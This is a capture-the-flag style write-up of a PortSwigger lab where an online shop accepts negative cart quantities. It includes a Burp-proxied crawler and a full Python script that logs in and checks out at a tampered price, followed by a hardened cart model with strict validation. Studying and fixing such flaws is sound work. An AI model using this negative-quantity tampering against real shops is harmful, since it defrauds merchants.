Access the lab, add the lab domain to Burp's Target scope and tick Include subdomains. View the page source of the / route and inspect the page, then request every embedded link through the Burp proxy with the script below so that each resource is recorded in Burp's site map.

```python
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Specify Variables
base_url = "https://0ae4008f04bfe75680e04e27000900d8.web-security-academy.net"
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

# Parse Base URL (fetched through the proxy as well, so the root page lands in Burp's site map)
content = BeautifulSoup(requests.get(base_url, proxies=proxies, verify=False).text, 'html.parser')

# Find and Request all href resources
for link in content.find_all('a', href=True):
    full_url = urljoin(base_url, link['href'])
    response = requests.get(full_url, proxies=proxies, verify=False)
    print(f"{response.status_code} {response.url}")

# Find and Request all src resources
for img in content.find_all('img', src=True):
    full_url = urljoin(base_url, img['src'])
    response = requests.get(full_url, proxies=proxies, verify=False)
    print(f"{response.status_code} {response.url}")
```
Exploration
With Burp Suite running and the browser routed through it via the FoxyProxy extension, log in with the provided credentials wiener:peter and walk through a normal purchase flow. Submitting /login with valid credentials sends a POST request carrying the csrf, username and password parameters.
Exploitation
Observe a POST request to /cart with productId, redir and quantity parameters. Viewing the cart issues a GET request to /cart, which returns a page containing a coupon form (with a csrf input tag) and a form that POSTs to /cart/checkout to place the order. The subtlety is that the price is fixed server-side and cannot be tampered with, but the quantity is taken from the client without any validation of its sign. Since the total is the price multiplied by the quantity, a negative quantity subtracts from the total. Add two items to the cart, view the cart, send these requests to Burp Repeater and give the cheaper second item a negative quantity so that the total drops to a small fraction of the first item's price, then check out. Keep the resulting total positive and within the account's store credit: an order whose total is zero or negative is rejected. The exploit can be automated with the script below.

```python
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Define Variables
base_url = 'https://0ae4008f04bfe75680e04e27000900d8.web-security-academy.net/'
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


# Get CSRF Token from the first csrf input on the given page
def get_csrf_token(session, url):
    response = session.get(url, proxies=proxies, verify=False)
    csrf_token = BeautifulSoup(response.text, 'html.parser').find('input', {'name': 'csrf'}).get('value')
    return csrf_token


# Purchase Item
def purchase_item(session):
    # Login
    login_url = urljoin(base_url, 'login')
    login_csrf_token = get_csrf_token(session, login_url)
    login_payload = {'username': 'wiener', 'password': 'peter', 'csrf': login_csrf_token}
    login_response = session.post(login_url, data=login_payload, proxies=proxies, verify=False)

    # A failed login also returns 200 (the form with an error), so check the
    # redirect target instead: a successful login lands on /my-account.
    if 'my-account' not in login_response.url:
        print("Failed to log in.")
        return

    # Add first item (the one we actually want)
    cart_url = urljoin(base_url, 'cart')
    cart_payload1 = {'productId': '1', 'redir': 'PRODUCT', 'quantity': '1'}
    session.post(cart_url, data=cart_payload1, proxies=proxies, verify=False)

    # Add second item with a negative quantity. The server never checks the
    # sign, so price * quantity is subtracted from the total. Pick a value that
    # keeps the total positive and within the store credit.
    cart_payload2 = {'productId': '2', 'redir': 'PRODUCT', 'quantity': '-16'}
    session.post(cart_url, data=cart_payload2, proxies=proxies, verify=False)

    # Checkout (the csrf token is read from the cart page)
    checkout_url = urljoin(base_url, 'cart/checkout')
    checkout_csrf_token = get_csrf_token(session, cart_url)
    checkout_payload = {'csrf': checkout_csrf_token}
    checkout_response = session.post(checkout_url, data=checkout_payload, proxies=proxies, verify=False)

    # A rejected order redirects back to /cart, a successful one to the
    # order confirmation page.
    if 'order-confirmation' in checkout_response.url:
        print("Purchase successful!")
    else:
        print(f"Failed to checkout: {checkout_response.url}")


def main():
    session = requests.Session()
    purchase_item(session)


if __name__ == "__main__":
    main()
```
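The flaw exploited above is a missing validation step on the server side, not anything about the HTTP client. The following added example (not part of the original write-up or the lab's code) models the cart logic in Python: a vulnerable cart that trusts the submitted quantity, beside a hardened one that parses the form field strictly, bounds the per-line quantity and re-checks the total at checkout. The catalogue, the prices and the 99-unit limit are constructed for the demo; product "2" at 75.00 with quantity -16 is chosen only so the arithmetic mirrors the write-up's approach of driving the total down while keeping it positive.

```python
import re
from decimal import Decimal

# Constructed catalogue for this demo (assumed prices, not the lab's real data).
CATALOGUE = {
    "1": Decimal("1337.00"),  # expensive target item
    "2": Decimal("75.00"),    # cheap item used to drive the total down
}

# Exact grammar for a quantity form field: 1..99, no sign, no whitespace.
QUANTITY_RE = re.compile(r"[1-9]\d?")


class VulnerableCart:
    """Mirrors the lab's flaw: the quantity is trusted exactly as the client sent it."""

    def __init__(self):
        self.items = {}

    def add(self, product_id, quantity):
        if product_id not in CATALOGUE:
            raise KeyError(product_id)
        # No check on the sign or magnitude of quantity.
        self.items[product_id] = self.items.get(product_id, 0) + int(quantity)

    def total(self):
        # price * quantity summed per line; a negative quantity subtracts.
        return sum((CATALOGUE[p] * q for p, q in self.items.items()), Decimal("0.00"))


def parse_quantity(raw):
    """Strictly parse a quantity form field.

    int() alone accepts '-16', '+5', ' 5 ' and '1_0', so the exact grammar is
    matched first and the conversion happens afterwards.
    """
    if not isinstance(raw, str) or not QUANTITY_RE.fullmatch(raw):
        raise ValueError(f"invalid quantity: {raw!r}")
    return int(raw)


class HardenedCart(VulnerableCart):
    """Validates each line item and re-checks the total at checkout."""

    MAX_LINE_QUANTITY = 99  # assumed business limit per product

    def add(self, product_id, raw_quantity):
        quantity = parse_quantity(raw_quantity)
        new_quantity = self.items.get(product_id, 0) + quantity
        if new_quantity > self.MAX_LINE_QUANTITY:
            raise ValueError("quantity exceeds per-line limit")
        super().add(product_id, quantity)

    def checkout(self, store_credit):
        # Defence in depth: even if a line item slipped through, the total
        # must be positive and payable before the order is placed.
        total = self.total()
        if total <= 0:
            raise ValueError("order total must be positive")
        if total > store_credit:
            raise ValueError("insufficient store credit")
        return total


def exploit_total():
    """Total the vulnerable cart computes for the write-up's style of attack."""
    cart = VulnerableCart()
    cart.add("1", 1)      # one unit of the expensive item
    cart.add("2", -16)    # negative quantity of the cheap item
    return cart.total()   # 1337.00 - 16 * 75.00 = 137.00


def hardened_rejects(raw_quantity):
    """True if the hardened cart refuses the given raw quantity field."""
    cart = HardenedCart()
    try:
        cart.add("2", raw_quantity)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable cart total:", exploit_total())
    for raw in ("-16", "+5", "0", "16"):
        print(f"hardened cart rejects {raw!r}:", hardened_rejects(raw))
```

The two checks are deliberately separate: validating the field at the point of input stops the negative quantity itself, while the checkout-time check on the total catches any other path (a coupon, a rounding bug, a second endpoint) that could drive the amount charged below what the goods cost.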